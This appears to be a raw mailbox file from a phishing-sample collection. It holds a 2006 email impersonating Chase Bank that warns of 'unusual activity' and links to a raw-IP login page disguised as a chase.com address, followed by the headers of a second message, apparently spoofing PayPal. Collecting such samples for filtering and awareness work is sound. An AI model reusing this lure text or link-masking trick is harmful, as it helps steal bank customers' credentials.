From: "Chase" <chase@chase.com>
Reply-To: "Chase" <chase@chase.com>
To: nobody@example.com, dugsong@example.com
Subject: Chase Bank Credit Card Holders Important Issue
Date: Thu, 06 Apr 2006 05:47:17 +0400
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--047878874649190966"
X-Priority: 1
X-MSMail-Priority: High
Status: O
X-Status: 
X-Keywords:                  
X-UID: 739

----047878874649190966
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www=
w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns=3D"http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1" />
<title>Untitled Document</title>
</head>

<body>
<table width=3D"673" border=3D"0">
  <tr>
    <td><div align=3D"right"><a href=3D"http://216.85.56.34:81/chase/colpo=
rtal/prospect.php?_nfpb=3Dchange_form" target=3D"_blank"><img src=3D"http:=
//www.chase.com/ccpmweb/shared/image/chaseNewlogo.gif" width=3D"138" heigh=
t=3D"27" border=3D"0" /></a></div></td>
  </tr>
</table>
<table width=3D"673" height=3D"232" border=3D"0">
  <tr>
    <td><p>Your online credit card account has high-risk activity status. =
We are contacting you to remind that on April 08 2006 our Account Review T=
eam identified some unusual activity in your account. In accordance with C=
hase Bank User Agreement and to ensure that your account has not been comp=
romised, access your account was limited. Your account access will remain =
limited until this issue has been resolved.</p>
    <p>We encourage you to log in and perform the steps necessary to resto=
re your account access as soon as possible. Allowing your account access t=
o remain limited for an extended period of time may result in further limi=
tations on the use of your account and possible account closure.<br />
    </p>
    <p>Login to your limit account and restore online access:<br />
      <a href=3D"http://216.85.56.34:81/chase/colportal/prospect.php?_nfpb=
=3Dchange_form" target=3D"_blank">https://www.chase.com/asp/services/updat=
e.php?account313985</a></p>
    <p>This notification is part of the All-Electronic Program you enrolle=
d in to receive your activity report online.<br />
    </p></td>
  </tr>
</table>
<p>&nbsp;</p>
</body>
</html>


----047878874649190966--

From service@paypal.com  Thu Apr  6 07:39:24 2006
Return-Path: <service@paypal.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by naughty.example.com (Postfix) with ESMTP id 6AC32536F14
	for <nobody@login.example.com>; Thu,  6 Apr 2006 07:39:24 -0400 (EDT)
Received: from mail.com (uslec-66-43-162-166.cust.uslec.net [66.43.162.166])
	by mail1.example.com (Postfix) with SMTP id 4FBC06CCF0D
	for <nobody@example.com>; Thu,  6 Apr 2006 02:53:04 -0400 (EDT)
Reply-To: <do-not-reply@paypal.com>
